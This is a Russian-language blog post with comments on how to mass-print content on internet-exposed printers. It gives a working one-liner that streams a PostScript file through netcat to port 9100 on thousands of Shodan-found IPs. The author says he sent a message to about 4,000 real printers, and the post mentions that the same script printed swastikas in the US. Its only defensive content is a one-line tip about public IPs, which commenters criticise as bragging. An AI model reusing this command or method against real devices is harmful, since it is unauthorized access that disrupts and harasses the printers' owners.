Как взломать тысячи принтеров в РФ и распечатать всё, что захочешь

    Казалось бы, кто присваивает принтерам публичные IP адреса? Но я недавно нашел интересный скрипт, который позволяет распечатывать все, что угодно на принтерах с публичными IP. Впервые при помощи него распечатали свастику на 20+ тыс. принтеров в США. Я же решил побаловаться с принтерами в РФ, подробности и сам скрипт в продолжении.

    image

    Код:

    cat /tmp/russiaips | parallel —jobs 40 ‘cat russia.ps | netcat -q 0 {} 9100’
    


    «russia.ps»
    — изображение в формате PostScript, которое нужно напечатать
    «russiaips»
    — это IP адреса принтеров, найденные в Shodan (черный поисковик, примеры поиска в Shodan).

    Удалось найти всего около 4 тысяч принтеров (РФ + пару соседних стран), на которые я и
    отправил послание. Cамо послание на Хабре публиковать не буду по этическим соображениям, как и список IP адресов, но механизм сбора, думаю, понятен. Данная статья не является призывом к действию и не содержит никакого вредоносного кода, однако заставляет задуматься над безопасностью публично доступных данных и о возможных последствиях.

    Способы защиты очевидны — не присваивайте принтерам публичные IP адреса, если в этом нет крайней необходимости.

    Как видно, похожие действия могут вызвать существенный общественный резонанс: Статья Washington Post, NY Times, IB Times смотря что печатать.

    P.S. Все переживали, что меня забрали «компетентные органы» после статьи «Как мы взломали 18 работающих кардерских магазинов и не взяли ни цента» и «они» же её удалили, это не так, со мной всё ок, никто не приходил, но многие писали, а статью просто удалили за нарушение правил Хабра. Надеюсь, эту не удалят.
    Поделиться публикацией
    Похожие публикации
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама
    Комментарии 14
    • 0
      вложений не видно только с телефона?
      • +14
        По-моему опять же ниапчом.
        • +10
          «Данная статья не является» ничем иным как бессмысленным хвастовством. Особенно учитывая «послание на Хабре публиковать не буду по этическим соображениям». Инструкцию по устранению проблемы все же можно было написать так, чтобы этические соображения не мешали ее публиковать.
          • +3
            Думал это очевидно — не присваивать принтерам публичные IP адреса, если в этом нет крайней необходимости. Но после Вашего комментария добавил это в статью.Спасибо.
          • +3
            Да бросте вы, просто автор реагирует, как из мухи делают слона. Вот распечатал он только зря :)
            Даже тот же nmap не нагружает порт 9100, чтобы не распечатывать всякую дичь. Так это еще с доисторических лет!)
            Всё это понятно любому, а вот СМИ подхватывают и пиарят «крутых хакеров», которые «взломали» тысячи принтеров. Всё давно уже взломано, ребята.

            • +4
              О том и статья, что, используя поисковик и однострочный код, можно «развлекаться» или делать «поводы» для СМИ. Так же, помимо принтеров, тем же методом можно накопать кучу открытых камер, из чего регуляно делают «сенсации», особенно, если это камера в банке или борделе… Вы правы «всё уже взломано», но люди не понимают насколько это опасно, если им не показать.
              • +1
                Это да…
                Открываешь шодан — о, куча %object% без пароля. Лол

                Полгода спустя в СМИ: специалисты компании %company% нашли 100500 незащищенных %object%!
                • +1
                  В бизнесе, помимо скиллов, нужно уметь круто PR(иться), любую новость можно подать с «ВауЭффектом». И не стоит забывать о том, что хабровчанам и специалистам кажется элементарным, для остальных может быть «изучением тёмной материи».
            • +4

              Не умеете вы водяные знаки на изображениях замазывать.
            • +7
              А что уже открыта неделя банальных статеек?
              • +2
                Все завидуют твиттеру.
              • 0
                Удалось найти всего около 4 тысяч принтеров (РФ + пару соседних стран), на которые я и
                отправил послание

                Как интерпретировать эту цифру? Как реальное количество устройств, которые напечатали текст? Или как устройства с открытым 9 100 портом, которые не факт, что относятся к службе принтера?
                • 0
                  Дома ещё проверьте, наверняка есть открытые вафли от принтеров.

                  Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.